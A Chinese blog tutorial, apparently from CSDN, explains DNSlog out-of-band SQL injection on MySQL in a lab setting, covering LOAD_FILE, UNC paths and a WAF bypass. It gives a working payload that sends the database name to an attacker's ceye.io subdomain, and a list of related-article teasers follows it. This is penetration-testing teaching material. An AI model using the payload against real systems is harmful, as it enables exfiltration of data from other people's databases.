DNSLOG注入

最新推荐文章于 2024-06-28 11:53:51 发布
最新推荐文章于 2024-06-28 11:53:51 发布
阅读量8.9k 收藏 34
点赞数 9
分类专栏: web渗透学习笔记 文章标签: SQL注入 盲注姿势 dns注入 dnslog注入 注入原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35569814/article/details/100348097
版权

注入简介

什么是dnslog注入?

dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据

为什么要进行dnslog注入?

一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。

知识扩展

首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性

secure_file_priv特性,有三种状态

  1. secure_file_priv为null    表示不允许导入导出
  2. secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
  3. secure_file_priv没有设置时,则表示没有任何限制

可了解一下load_file和outfile

LOAD_FILE()函数

LOAD_FILE()函数读取一个文件并将其内容作为字符串返回

语法为:load_file(file_name),其中file_name是文件的完整路径

此函数使用需要满足的条件

  1. 文件必须位于服务器主机上
  2. 你必须具有该FILE权限才能读取该文件。拥有该FILE权限的用户可以读取服务器主机上的任何文件,该文件是world-readable的或MySQL服务器可读的,此属性与secure_file_priv状态相关
  3. 文件必须是所有人都可读的,并且它的大小小于max_allowed_packet字节

UNC路径

什么是UNC路径?

UNC路径就是类似\\softer这样的形式的网络路径。它符合 \\servername\sharename 格式,其中 servername 是服务器名,sharename 是共享资源的名称。

目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:\\servername\sharename\directory\filename。

例如把自己电脑的文件共享,你会获得如下路径,这就是UNC路径

//iZ53sl3r1890u7Z/Users/Administrator/Desktop/111.txt

DNSLOG平台

http://www.dnslog.cn

http://admin.dnslog.link

http://ceye.io

注入实现

打开靶场所在url,这里有个安全狗,可以通过注释符号绕过,也可以通过web容器的解析特性绕过,解析特性是对后缀名为txt之类的文件,不进行传参的安全检测

经过测试,此处无法使用联合查询,可以选择盲注,这里选择dns带外查询,打开ceye平台,查看我们的域名,如下图

构造合适的UNC路径,concat('//',(select database()),'.o8auqr.ceye.io/abc'),UNC路径是concat函数内的字符串,代表去访问一个域名下的abc文件夹,此处查询的域名属于o8auqr.ceye.io的子域名,在访问的过程中,解析记录会被保存

构造查询语句,poyload:and (select load_file(concat('//',(select database()),'.o8auqr.ceye.io/abc'))),点击访问

打开平台,查看记录,成功解析,如下图

注意:load_file()函数访问的是文件,所以域名后面需要添加/abc

其他查询步骤不在一一列出

秋水sir
关注
专栏目录
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1807
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
DNSlog注入原理
sjp_1996的博客
04-20 3293
DNSlog注入原理及实验 遵守我国网络安全法,仅用于渗透测试交流学习。 DNS解析过程 用户输入域名,浏览器知道是域名,然后通过DNS解析为IP地址,最后浏览器通过IP地址访问服务器。IP地址与域名是应是一对多映射的关系。 DNSlog的产生 DNS在解析的过程中产生日志文件,这些日志文件记录了访问时间、域名、IP地址等信息内容。 实验 1、公共DNS免费平台:www.DNSlog.con,点击GetSubDomain,会随机生成一个域名。 此时打开CMD,用ping命令,ping通这个域名。因为我的
CEYE平台的使用
weixin_30565199的博客
06-09 2147
0x01 CEYE 是什么 CEYE是一个用来检测带外(Out-of-Band)流量的监控平台,如DNS查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息(例如SSRF / XXE / RFI / RCE)。 0x02 CEYE的使用场景 漏洞检测或漏洞利用需要进一步的用户或系统交互。 一些漏洞类型没有直接表明攻击是成功的。如Payload触发了却不在前...
DNS_LOG注入
学习、分享、交流
05-19 1614
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
【安全工具】DNSlog工具原理搭建及使用(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
06-28 3376
比如说,我注册了一个为luomiweixiong.com的域名,我将 它的a记录泛解析到139.x.x.x上,这样就实现了无论我记录值填什么他都有解析,并且都指向139.x.x.x,当我向dns服务器发起test.luomiweixiong.com的解析请求时,DNSlog中会记录下他给test.luomiweixiong.com解析,解析值为139.x.x.x.网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
DNSLog注入
errorr0
06-27 1157
DNSLog注入漏洞
DNSlog注入学习
mingyqf的博客
06-03 1882
原文链接:https://www.cnblogs.com/Xy–1/p/12896599.html 作者: Lushun之前一直有看到过DNSlog这个字眼,但一直没有好好去了解一下,最近又接触到了刚好来深入学习下 我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.
https防止注入_数据库DNSLog外带注入总结
weixin_39553600的博客
11-20 588
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等...
DNSlog注入浅谈
m0_49972294的博客
12-13 836
文章目录前言一、前提条件二、利用步骤1.注册一个域名2.数据库配置3.实际操作总结 前言 DNSlog在Web漏洞利用简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。 这里使用的DNS的原因是:DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息 简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息。 一、前提条件 1、SQL盲注、无回显的命令执行、无回显的SSRF ; 2、只能用.
sqlmap+dnslog注入复现
qq_50646296的博客
08-07 1019
2.准备两台虚拟机,一台为Kali(作为攻击机)另一台使用Windows server2008 R2(作为DNS服务器),使用本地物理机作为肉机。编辑本地肉机的dns设置,改为手动,首选DNS写windows server2008 的IP地址。查看secure_file_priv 是否为空值,如果是NULL,需要将其改为空。2 不存在,则在[mysqld]下,新增secure_file_priv=""。然后添加A记录,一条ns,作为域dns服务器,一条*匹配所有子域。配置DNS服务器ip信息和dns信息。.
DNSlog注入
7Riven's blog
12-31 925
DNSlog注入产生 测试一些网站的时候,一些注入都是无回显的,可以通过写脚本来进行盲注,但有些网站会ban掉我们的ip,可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSlog注入应用场景 sql注入盲注、无回显的命令执行、无回显的SSRF DNSlog注入原理 有一个可以配置的域名(比如:ceye.io),然后通过代理商设置域名(ceye.io)...
dnsgo:小型,可爱的DNS服务器。 使用它来测试Web安全性,例如dnslogdns重新绑定。 有点像ceye.io
04-29
dnsgo 那是什么? 这是一台dns服务器,您可以在需要使用自己的dns服务器时使用它。 在哪里使用? 将其用作网站的名称服务器(现在仅支持“ A”记录)。 在内部网络中使用它。 如快速的dns缓存服务器。 而且,您可以使用它来防御dns DNS缓存污染。 需要获取dns记录时使用它。 不仅监视dns请求,而且还监视诸如dns重新绑定之类的Web安全测试。 如何使用它? 安装 go get github.com/grt1st/dnsgo cd $GOPATH/src/github.com/grt1st/dnsgo go build github.com/grt1st/dnsgo ./dnsgo -h 命令 $ [dnsgo]: ./dnsgo -h Usage: ./dnsgo [Options] Options -h Show usage -host string
dnslog注入原理
07-29
DNSLog注入是一种利用DNS协议的安全漏洞进行攻击的方法。它利用了DNS服务器对于域名解析请求的处理方式,通过在恶意构造的域名中插入恶意代码,从而实现对目标系统的攻击或信息收集。 具体的注入原理如下: 1. DNS...
DNSlog外带原理注入分析
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
好用的dnslog在线平台
热门推荐
siu~
08-21 2万+
dnslog在线平台分享
DNSlog注入姿势
qq_43681802的博客
02-08 851
DNSlog注入(mysql数据库sql注入姿势) 简介:本文记录sql注入中的注入姿势DNSlog注入原理及其构造payload过程 文章目录DNSlog注入(mysql数据库sql注入姿势)前言一、什么是DNS(域名系统)?二、DNSlog注入注入场景注入具备条件什么是UNC路径?1.注入原理2.注入过程总结 前言 DNSLOG注入不是一种新的sql注入方式,而是一种注入姿势。方便为我们进行sql注入提供方法 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是DNS(域名系统)? DN
分享一个dnslog在线平台
2301_76297780的博客
06-19 476
分享一个dnslog在线平台
WEB漏洞攻防 - SQL注入 - Dnslog注入
易编橙 · 终身成长社群,相遇已是上上签!
08-02 879
存在利用瓶颈,比较鸡肋。除了注入会用到,在其他场景也会用到,主要学习dns注入原理。 必须是Windows服务器、注入实现url访问、注入点必须是高权限且可执行写入。 原理:借助DNS解析产生日志的一个作用,来实现把一些数据反弹出来,类似反弹链接的作用。 应用场景:解决不回显(反向连接),SQL注入,命令执行,SSRF等
DNSLOG相关知识
12306小哥
07-15 595
0x01 DNS知识 域名系统(Domain Name System),是互联网使用的命名系统,用来便于人们使用的机器名字转换为IP地址。 0x02 DNS解析 2.1 解析过程要点 当某一个应用进程需要把主机名解析为IP地址时,该应用进程就调用解析程序,并成为DNS的一个客户(DNS Client),把待解析的域名放在DNS请求报文中,以UDP用户数据报方式发给本地域名服务器(使用UDP是为了减少开销)。本地域名服务器在查找域名后,把对应的IP地址放在响应报文中返回。应用进程获得目的主机的IP地址后即可进
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值